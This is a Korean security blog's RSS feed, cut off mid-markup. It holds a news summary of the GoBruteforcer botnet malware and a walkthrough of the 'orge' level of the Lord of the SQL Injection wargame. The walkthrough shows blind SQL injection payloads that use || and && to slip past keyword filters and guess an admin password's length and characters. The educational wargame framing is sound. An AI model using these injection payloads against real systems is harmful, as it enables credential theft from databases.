<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>태군 코드 : Security, travel &amp;amp; communication</title>
    <link>https://securitycode.tistory.com/</link>
    <description></description>
    <language>ko</language>
    <pubDate>Fri, 10 Jul 2026 14:14:55 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>태군 코드</managingEditor>
    <item>
      <title>GoBruteforcer: 무차별 대입 공격을 통해 웹 서버를 침해하는 새로운 Golang 기반 맬웨어</title>
      <link>https://securitycode.tistory.com/279</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;GoBruteforcer&amp;nbsp;라고&amp;nbsp;불리는&amp;nbsp;새로운&amp;nbsp;Golang&amp;nbsp;기반&amp;nbsp;멀웨어가&amp;nbsp;phpMyAdmin,&amp;nbsp;MySQL,&amp;nbsp;FTP&amp;nbsp;및&amp;nbsp;Postgres를&amp;nbsp;실행하는&amp;nbsp;웹&amp;nbsp;서버를&amp;nbsp;대상으로&amp;nbsp;장치를&amp;nbsp;봇넷으로&amp;nbsp;몰아넣는&amp;nbsp;것으로&amp;nbsp;발견되었습니다. &lt;br /&gt;&lt;br /&gt;Palo&amp;nbsp;Alto&amp;nbsp;Networks&amp;nbsp;Unit&amp;nbsp;42의&amp;nbsp;연구원들은&amp;nbsp;&quot;GoBruteforcer는&amp;nbsp;공격&amp;nbsp;중에&amp;nbsp;네트워크를&amp;nbsp;스캔하기&amp;nbsp;위해&amp;nbsp;CIDR&amp;nbsp;(Classless&amp;nbsp;Inter-Domain&amp;nbsp;Routing)&amp;nbsp;블록을&amp;nbsp;선택했으며&amp;nbsp;해당&amp;nbsp;CIDR&amp;nbsp;범위&amp;nbsp;내의&amp;nbsp;모든&amp;nbsp;IP&amp;nbsp;주소를&amp;nbsp;표적으로&amp;nbsp;삼았습니다.&quot;&amp;nbsp;라고&amp;nbsp;밝혔습니다&amp;nbsp;. &lt;br /&gt;&lt;br /&gt;&quot;공격자는&amp;nbsp;단일&amp;nbsp;IP&amp;nbsp;주소를&amp;nbsp;대상으로&amp;nbsp;사용하는&amp;nbsp;대신&amp;nbsp;네트워크&amp;nbsp;내의&amp;nbsp;서로&amp;nbsp;다른&amp;nbsp;IP에&amp;nbsp;있는&amp;nbsp;광범위한&amp;nbsp;대상&amp;nbsp;호스트에&amp;nbsp;액세스하는&amp;nbsp;방법으로&amp;nbsp;CIDR&amp;nbsp;블록&amp;nbsp;스캐닝을&amp;nbsp;선택했습니다.&quot;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;GoBruteforcer는&amp;nbsp;주로&amp;nbsp;x86,&amp;nbsp;x64&amp;nbsp;및&amp;nbsp;ARM&amp;nbsp;아키텍처를&amp;nbsp;실행하는&amp;nbsp;Unix와&amp;nbsp;유사한&amp;nbsp;플랫폼을&amp;nbsp;선별하도록&amp;nbsp;설계되었으며&amp;nbsp;악성코드는&amp;nbsp;바이너리에&amp;nbsp;하드&amp;nbsp;코딩된&amp;nbsp;자격&amp;nbsp;증명&amp;nbsp;목록을&amp;nbsp;사용하여&amp;nbsp;무차별&amp;nbsp;대입&amp;nbsp;공격을&amp;nbsp;통해&amp;nbsp;액세스를&amp;nbsp;시도합니다&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;공격이&amp;nbsp;성공하면&amp;nbsp;IRC&amp;nbsp;(Internet&amp;nbsp;Relay&amp;nbsp;Chat&amp;nbsp;)&amp;nbsp;봇이&amp;nbsp;피해자&amp;nbsp;서버에&amp;nbsp;배치되어&amp;nbsp;행위자가&amp;nbsp;제어하는&amp;nbsp;​​서버와의&amp;nbsp;통신을&amp;nbsp;설정합니다. &lt;br /&gt;&lt;br /&gt;GoBruteforcer는&amp;nbsp;또한&amp;nbsp;피해자&amp;nbsp;서버에&amp;nbsp;이미&amp;nbsp;설치된&amp;nbsp;PHP&amp;nbsp;웹&amp;nbsp;셸을&amp;nbsp;활용하여&amp;nbsp;대상&amp;nbsp;네트워크에&amp;nbsp;대한&amp;nbsp;자세한&amp;nbsp;정보를&amp;nbsp;수집합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;출처&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;a href=&quot;https://thehackernews.com/2023/03/gobruteforcer-new-golang-based-malware.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;https://thehackernews.com/2023/03/gobruteforcer-new-golang-based-malware.html&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1679897935749&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;GoBruteforcer: New Golang-Based Malware Breaches Web Servers via Brute-Force Attacks&quot; data-og-description=&quot;GoBruteforcer has been found targeting web servers running phpMyAdmin, MySQL, FTP, and Postgres to corral the devices into a botnet.&quot; data-og-host=&quot;thehackernews.com&quot; data-og-source-url=&quot;https://thehackernews.com/2023/03/gobruteforcer-new-golang-based-malware.html&quot; data-og-url=&quot;https://thehackernews.com/2023/03/gobruteforcer-new-golang-based-malware.html&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/X2ATg/hyR394cfLF/rfiKAbRqpzIYV6oZHJeuJk/img.png?width=728&amp;amp;height=380&amp;amp;face=0_0_728_380,https://scrap.kakaocdn.net/dn/Cynmi/hyR37ywNJi/YiS1qVv7XoXDQRxriyyAMK/img.png?width=728&amp;amp;height=380&amp;amp;face=0_0_728_380&quot;&gt;&lt;a href=&quot;https://thehackernews.com/2023/03/gobruteforcer-new-golang-based-malware.html&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://thehackernews.com/2023/03/gobruteforcer-new-golang-based-malware.html&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/X2ATg/hyR394cfLF/rfiKAbRqpzIYV6oZHJeuJk/img.png?width=728&amp;amp;height=380&amp;amp;face=0_0_728_380,https://scrap.kakaocdn.net/dn/Cynmi/hyR37ywNJi/YiS1qVv7XoXDQRxriyyAMK/img.png?width=728&amp;amp;height=380&amp;amp;face=0_0_728_380');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;GoBruteforcer: New Golang-Based Malware Breaches Web Servers via Brute-Force Attacks&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;GoBruteforcer has been found targeting web servers running phpMyAdmin, MySQL, FTP, and Postgres to corral the devices into a botnet.&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;thehackernews.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Code::보안이슈</category>
      <category>FTP</category>
      <category>GoBruteforcer</category>
      <category>mysql</category>
      <category>phpmyadmin</category>
      <category>postgres</category>
      <category>봇넷</category>
      <category>스캔</category>
      <author>태군 코드</author>
      <guid isPermaLink="true">https://securitycode.tistory.com/279</guid>
      <comments>https://securitycode.tistory.com/279#entry279comment</comments>
      <pubDate>Mon, 27 Mar 2023 15:20:09 +0900</pubDate>
    </item>
    <item>
      <title>[LOS] Lord of the SQL Injection - orge</title>
      <link>https://securitycode.tistory.com/278</link>
      <description>&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;허용받지&amp;nbsp;않은&amp;nbsp;서비스&amp;nbsp;대상으로&amp;nbsp;해킹을&amp;nbsp;시도하는&amp;nbsp;행위는&amp;nbsp;범죄&amp;nbsp;행위입니다.&lt;/span&gt;&amp;nbsp;해킹을&amp;nbsp;시도할&amp;nbsp;때에&amp;nbsp;발생하는&amp;nbsp;법적인&amp;nbsp;책임은&amp;nbsp;그것을&amp;nbsp;행한&amp;nbsp;사용자에게&amp;nbsp;있다는&amp;nbsp;것을&amp;nbsp;명심하시기&amp;nbsp;바랍니다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;648&quot; data-origin-height=&quot;372&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cENo9S/btr0JAuaLTi/FDzLgWR3wtaXjVhfBkXvxK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cENo9S/btr0JAuaLTi/FDzLgWR3wtaXjVhfBkXvxK/img.png&quot; data-alt=&quot;Lord of the SQL Injection - orge&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cENo9S/btr0JAuaLTi/FDzLgWR3wtaXjVhfBkXvxK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcENo9S%2Fbtr0JAuaLTi%2FFDzLgWR3wtaXjVhfBkXvxK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;640&quot; height=&quot;367&quot; data-origin-width=&quot;648&quot; data-origin-height=&quot;372&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Lord of the SQL Injection - orge&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;Lord&amp;nbsp;of&amp;nbsp;the&amp;nbsp;SQL&amp;nbsp;Injection&amp;nbsp;-&amp;nbsp;orge&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : porb _ . ( ) 필터링이 되어 있고 i 옵션을 통하여 대소문자를 구분하지 않음 pw='필터링값'이 있을 경우 &quot;No Hack ~_~&quot; 문구를 출력합니다. &lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;preg_match : or, and 문자가 필터링이 되어 있고 i 옵션을 통하여 대소문자를 구분하지 않음 pw='필터링값'이 있을 경우 &quot;HeHe&quot; 문구를 출력합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;or 문자는 || (%7c%7c) 문자로 우회 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;and 문자는 &amp;amp;&amp;amp;(%26%26) 문자로 우회 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;addslashes() 함수 : 이스케이프해야 하는 문자 앞에 백슬래시가(\) 추가된 문자열을 반환합니다. 이러한 문자는 다음과 같습니다. &lt;br /&gt;&lt;br /&gt;작은따옴표(&amp;nbsp;') &lt;br /&gt;큰따옴표(&amp;nbsp;&quot;) &lt;br /&gt;백슬래시(&amp;nbsp;\) &lt;br /&gt;NUL(NUL&amp;nbsp;바이트)&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$query&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;=&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;&quot;select&amp;nbsp;pw&amp;nbsp;from&amp;nbsp;prob_orge&amp;nbsp;where&amp;nbsp;id='admin'&amp;nbsp;and&amp;nbsp;pw='&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;{&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;$_GET&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;[&lt;/span&gt;&lt;span style=&quot;color: #0000bb;&quot;&gt;pw&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;]}&lt;/span&gt;&lt;span style=&quot;color: #dd0000;&quot;&gt;'&quot;&lt;/span&gt;&lt;span style=&quot;color: #007700;&quot;&gt;;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;해당 문제는 'admin'의 패스워드를 알아내는 문제입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;bWAPP DB 와 같이 비교하면서 문제를 살펴보도록 하겠습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;bWAPP DB&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;1. bWAPP DB의 'users' 테이블의 컬럼 이름 출력&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;668&quot; data-origin-height=&quot;297&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/noILv/btr01UkuvB1/Y0j6Aj5VIlGGuZko71q511/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/noILv/btr01UkuvB1/Y0j6Aj5VIlGGuZko71q511/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/noILv/btr01UkuvB1/Y0j6Aj5VIlGGuZko71q511/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnoILv%2Fbtr01UkuvB1%2FY0j6Aj5VIlGGuZko71q511%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;650&quot; height=&quot;289&quot; data-origin-width=&quot;668&quot; data-origin-height=&quot;297&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;2. 'users' 테이블의 'login', 'password' 컬럼의 정보 확인&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;454&quot; data-origin-height=&quot;148&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bsCeHB/btr01T6WUVP/ZMb5Z1lBLGN0gEw44DHVM1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bsCeHB/btr01T6WUVP/ZMb5Z1lBLGN0gEw44DHVM1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bsCeHB/btr01T6WUVP/ZMb5Z1lBLGN0gEw44DHVM1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbsCeHB%2Fbtr01T6WUVP%2FZMb5Z1lBLGN0gEw44DHVM1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;450&quot; height=&quot;147&quot; data-origin-width=&quot;454&quot; data-origin-height=&quot;148&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;3. length 함수를 이용하여 'bee' 계정의 패스워드 길이 확인&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;936&quot; data-origin-height=&quot;165&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/beJhaf/btr0Iu16ILE/XrSO8KdDUuYCxRbCf3oW2K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/beJhaf/btr0Iu16ILE/XrSO8KdDUuYCxRbCf3oW2K/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/beJhaf/btr0Iu16ILE/XrSO8KdDUuYCxRbCf3oW2K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbeJhaf%2Fbtr0Iu16ILE%2FXrSO8KdDUuYCxRbCf3oW2K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;132&quot; data-origin-width=&quot;936&quot; data-origin-height=&quot;165&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;color: #333333;&quot;&gt;해당 문제에서도 length 함수를 이용하여 패스워드 길이 추측이 가능하지만 패스워드 길이가 길어지면 그만 큼 시간이 오래 소요되기 때문에 앞에서 만들어 두었던 파이썬 코드를 이용하여 확인해 보도록 하겠습니다.&lt;/span&gt;&lt;span style=&quot;color: #333333;&quot;&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;756&quot; data-origin-height=&quot;444&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Fj4VR/btr0RJcOr08/6XN7nxkOkRP3gVTlRHFKiK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Fj4VR/btr0RJcOr08/6XN7nxkOkRP3gVTlRHFKiK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Fj4VR/btr0RJcOr08/6XN7nxkOkRP3gVTlRHFKiK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FFj4VR%2Fbtr0RJcOr08%2F6XN7nxkOkRP3gVTlRHFKiK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;440&quot; data-origin-width=&quot;756&quot; data-origin-height=&quot;444&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pw=' || id='admin' &amp;amp;&amp;amp; length(pw)=1#&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pw=' || id='admin' &amp;amp;&amp;amp; length(pw)=2#&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;pw=' || id='admin' &amp;amp;&amp;amp; length(pw)=3#&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;파이썬 코드를 이용한 패스워드 길이 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;545&quot; data-origin-height=&quot;372&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wQZBv/btr0RPc2TGa/ExU1L7ZwWk86xWrEeq0Ypk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wQZBv/btr0RPc2TGa/ExU1L7ZwWk86xWrEeq0Ypk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wQZBv/btr0RPc2TGa/ExU1L7ZwWk86xWrEeq0Ypk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwQZBv%2Fbtr0RPc2TGa%2FExU1L7ZwWk86xWrEeq0Ypk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;375&quot; data-origin-width=&quot;545&quot; data-origin-height=&quot;372&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;893&quot; data-origin-height=&quot;179&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/5TpQm/btr0NI6n0NA/MXUjbAYMjH7U398OZ1V1tk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/5TpQm/btr0NI6n0NA/MXUjbAYMjH7U398OZ1V1tk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/5TpQm/btr0NI6n0NA/MXUjbAYMjH7U398OZ1V1tk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F5TpQm%2Fbtr0NI6n0NA%2FMXUjbAYMjH7U398OZ1V1tk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;150&quot; data-origin-width=&quot;893&quot; data-origin-height=&quot;179&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;'admin' 의 패스워드 길이는 8자리 인 것을 확인하였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;4. substr 함수를 이용하여 패스워드 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;971&quot; data-origin-height=&quot;342&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cEFPCD/btr1bkCStqd/VeSGsphizxQcc4NkJo4zM0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cEFPCD/btr1bkCStqd/VeSGsphizxQcc4NkJo4zM0/img.png&quot; data-alt=&quot;bWAPP DB&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cEFPCD/btr1bkCStqd/VeSGsphizxQcc4NkJo4zM0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcEFPCD%2Fbtr1bkCStqd%2FVeSGsphizxQcc4NkJo4zM0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;264&quot; data-origin-width=&quot;971&quot; data-origin-height=&quot;342&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;bWAPP DB&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;bWAPP DB에서 substr 함수를 이용하여 'bee' 계정의 패스워드 첫 번째 자리와 두 번째 자리를 확인하였습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;파이썬 코드를 이용한 패스워드 확인&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;594&quot; data-origin-height=&quot;259&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/vuMMv/btr1bk3W8HM/b6KYTGSPuogKrHldM4RKI1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/vuMMv/btr1bk3W8HM/b6KYTGSPuogKrHldM4RKI1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/vuMMv/btr1bk3W8HM/b6KYTGSPuogKrHldM4RKI1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FvuMMv%2Fbtr1bk3W8HM%2Fb6KYTGSPuogKrHldM4RKI1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;550&quot; height=&quot;240&quot; data-origin-width=&quot;594&quot; data-origin-height=&quot;259&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;943&quot; data-origin-height=&quot;249&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bAhxoh/btr0RPc3w5z/d7BKoqwADNaEIxpAiNuwXK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bAhxoh/btr0RPc3w5z/d7BKoqwADNaEIxpAiNuwXK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bAhxoh/btr0RPc3w5z/d7BKoqwADNaEIxpAiNuwXK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbAhxoh%2Fbtr0RPc3w5z%2Fd7BKoqwADNaEIxpAiNuwXK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;750&quot; height=&quot;198&quot; data-origin-width=&quot;943&quot; data-origin-height=&quot;249&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;전체 소스 코드&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;582&quot; data-origin-height=&quot;625&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/loply/btr0RKCQumA/JwDhdPGjbOBOtlJOc9ksq0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/loply/btr0RKCQumA/JwDhdPGjbOBOtlJOc9ksq0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/loply/btr0RKCQumA/JwDhdPGjbOBOtlJOc9ksq0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Floply%2Fbtr0RKCQumA%2FJwDhdPGjbOBOtlJOc9ksq0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; 